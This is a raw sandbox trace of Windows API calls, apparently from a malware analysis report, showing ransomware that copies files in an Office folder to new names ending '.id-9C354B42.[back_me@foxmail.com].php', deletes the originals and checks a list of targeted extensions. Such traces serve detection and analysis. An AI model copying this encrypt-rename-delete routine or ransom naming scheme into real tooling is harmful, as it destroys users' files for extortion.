SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.982] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll")) returned 1 [0253.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.982] lstrlenW (lpString=".doc") returned 4 [0253.983] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".docx") returned 5 [0253.983] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0253.983] lstrlenW (lpString=".pdf") returned 4 [0253.983] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".xls") returned 4 [0253.983] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".xlsx") returned 5 [0253.983] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0253.983] lstrlenW (lpString=".ppt") returned 4 [0253.983] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString=".zip") returned 4 [0253.983] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".rar") returned 4 [0253.983] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".bz2") returned 4 [0253.983] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".7z") returned 3 [0253.983] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString=".dbf") returned 4 [0253.983] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString=".1cd") returned 4 [0253.983] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString=".jpg") returned 4 [0253.983] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.983] lstrlenW (lpString=".doc") returned 4 [0253.983] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0253.983] lstrlenW (lpString=".docx") returned 5 [0253.984] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0253.984] lstrlenW (lpString=".pdf") returned 4 [0253.984] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString=".xls") returned 4 [0253.984] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString=".xlsx") returned 5 [0253.984] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0253.984] lstrlenW (lpString=".ppt") returned 4 [0253.984] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.984] lstrlenW (lpString=".zip") returned 4 [0253.984] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString=".rar") returned 4 [0253.984] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString=".bz2") returned 4 [0253.984] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString=".7z") returned 3 [0253.984] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0253.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.984] lstrlenW (lpString=".dbf") returned 4 [0253.984] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.984] lstrlenW (lpString=".1cd") returned 4 [0253.984] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0253.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68 [0253.984] lstrlenW (lpString=".jpg") returned 4 [0253.984] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0253.985] lstrcmpiW (lpString1=".VRD", lpString2=".php") returned 1 [0253.985] lstrlenW (lpString="MOVE.VRD") returned 8 [0253.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0254.056] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=1420) returned 1 [0254.056] CloseHandle (hObject=0x37c) returned 1 [0254.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd")) returned 0x20 [0254.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0254.088] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.088] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0254.089] GetLastError () returned 0x0 [0254.089] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x58c, lpOverlapped=0x0) returned 1 [0254.091] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x590, lpOverlapped=0x0) returned 1 [0254.091] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.091] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0254.092] SetEndOfFile (hFile=0x390) returned 1 [0254.092] CloseHandle (hObject=0x390) returned 1 [0254.092] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.092] SetEndOfFile (hFile=0x394) returned 1 [0254.094] CloseHandle (hObject=0x394) returned 1 [0254.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0254.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd")) returned 1 [0254.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.094] lstrlenW (lpString=".doc") returned 4 [0254.094] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0254.094] lstrlenW (lpString=".docx") returned 5 [0254.094] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1 [0254.094] lstrlenW (lpString=".pdf") returned 4 [0254.094] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString=".xls") returned 4 [0254.095] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0254.095] lstrlenW (lpString=".xlsx") returned 5 [0254.095] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1 [0254.095] lstrlenW (lpString=".ppt") returned 4 [0254.095] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString=".zip") returned 4 [0254.095] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0254.095] lstrlenW (lpString=".rar") returned 4 [0254.095] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString=".bz2") returned 4 [0254.095] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString=".7z") returned 3 [0254.095] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString=".dbf") returned 4 [0254.095] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString=".1cd") returned 4 [0254.095] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString=".jpg") returned 4 [0254.095] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.095] lstrlenW (lpString=".doc") returned 4 [0254.095] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0254.095] lstrlenW (lpString=".docx") returned 5 [0254.095] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1 [0254.095] lstrlenW (lpString=".pdf") returned 4 [0254.095] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString=".xls") returned 4 [0254.096] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0254.096] lstrlenW (lpString=".xlsx") returned 5 [0254.096] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1 [0254.096] lstrlenW (lpString=".ppt") returned 4 [0254.096] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.096] lstrlenW (lpString=".zip") returned 4 [0254.096] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0254.096] lstrlenW (lpString=".rar") returned 4 [0254.096] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString=".bz2") returned 4 [0254.096] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString=".7z") returned 3 [0254.096] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0254.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.096] lstrlenW (lpString=".dbf") returned 4 [0254.096] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.096] lstrlenW (lpString=".1cd") returned 4 [0254.096] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0254.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56 [0254.096] lstrlenW (lpString=".jpg") returned 4 [0254.096] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0254.096] lstrcmpiW (lpString1=".HXC", lpString2=".php") returned -1 [0254.096] lstrlenW (lpString="MSOUC_COL.HXC") returned 13 [0254.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0254.097] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=621) returned 1 [0254.097] CloseHandle (hObject=0x394) returned 1 [0254.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc")) returned 0x20 [0254.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0254.097] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.097] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0254.099] GetLastError () returned 0x0 [0254.099] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x26d, lpOverlapped=0x0) returned 1 [0254.101] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x270, lpOverlapped=0x0) returned 1 [0254.102] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.102] WriteFile (in: hFile=0x390, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0254.102] SetEndOfFile (hFile=0x390) returned 1 [0254.102] CloseHandle (hObject=0x390) returned 1 [0254.102] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.102] SetEndOfFile (hFile=0x394) returned 1 [0254.104] CloseHandle (hObject=0x394) returned 1 [0254.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0254.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc")) returned 1 [0254.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.105] lstrlenW (lpString=".doc") returned 4 [0254.105] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0254.105] lstrlenW (lpString=".docx") returned 5 [0254.105] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0254.105] lstrlenW (lpString=".pdf") returned 4 [0254.105] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0254.105] lstrlenW (lpString=".xls") returned 4 [0254.105] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0254.105] lstrlenW (lpString=".xlsx") returned 5 [0254.105] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0254.105] lstrlenW (lpString=".ppt") returned 4 [0254.105] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0254.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.105] lstrlenW (lpString=".zip") returned 4 [0254.105] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0254.105] lstrlenW (lpString=".rar") returned 4 [0254.105] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0254.105] lstrlenW (lpString=".bz2") returned 4 [0254.105] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0254.105] lstrlenW (lpString=".7z") returned 3 [0254.105] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0254.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.105] lstrlenW (lpString=".dbf") returned 4 [0254.105] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0254.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.105] lstrlenW (lpString=".1cd") returned 4 [0254.105] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString=".jpg") returned 4 [0254.106] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString=".doc") returned 4 [0254.106] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0254.106] lstrlenW (lpString=".docx") returned 5 [0254.106] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0254.106] lstrlenW (lpString=".pdf") returned 4 [0254.106] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString=".xls") returned 4 [0254.106] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString=".xlsx") returned 5 [0254.106] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0254.106] lstrlenW (lpString=".ppt") returned 4 [0254.106] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString=".zip") returned 4 [0254.106] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString=".rar") returned 4 [0254.106] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0254.106] lstrlenW (lpString=".bz2") returned 4 [0254.106] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0254.106] lstrlenW (lpString=".7z") returned 3 [0254.106] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString=".dbf") returned 4 [0254.106] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0254.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.106] lstrlenW (lpString=".1cd") returned 4 [0254.106] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0254.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61 [0254.107] lstrlenW (lpString=".jpg") returned 4 [0254.107] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0254.107] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0254.107] lstrlenW (lpString="MSOUC_COL.HXT") returned 13 [0254.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0254.107] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=205) returned 1 [0254.107] CloseHandle (hObject=0x394) returned 1 [0254.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt")) returned 0x20 [0254.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0254.107] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.108] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0254.126] GetLastError () returned 0x0 [0254.126] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xcd, lpOverlapped=0x0) returned 1 [0254.127] WriteFile (in: hFile=0x200, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xd0, lpOverlapped=0x0) returned 1 [0254.127] ReadFile (in: hFile=0x394, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.128] WriteFile (in: hFile=0x200, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0254.128] SetEndOfFile (hFile=0x200) returned 1 [0254.128] CloseHandle (hObject=0x200) returned 1 [0254.128] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.128] SetEndOfFile (hFile=0x394) returned 1 [0254.130] CloseHandle (hObject=0x394) returned 1 [0254.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0254.143] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt")) returned 1 [0254.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61 [0254.143] lstrlenW (lpString=".doc") returned 4 [0254.144] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0254.144] lstrlenW (lpString=".docx") returned 5 [0254.144] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0254.144] lstrlenW (lpString=".pdf") returned 4 [0254.144] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0254.144] lstrlenW (lpString=".xls") returned 4 [0254.144] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0254.144] lstrlenW (lpString=".xlsx") returned 5 [0254.144] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0254.144] lstrlenW (lpString=".ppt") returned 4 [0254.144] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 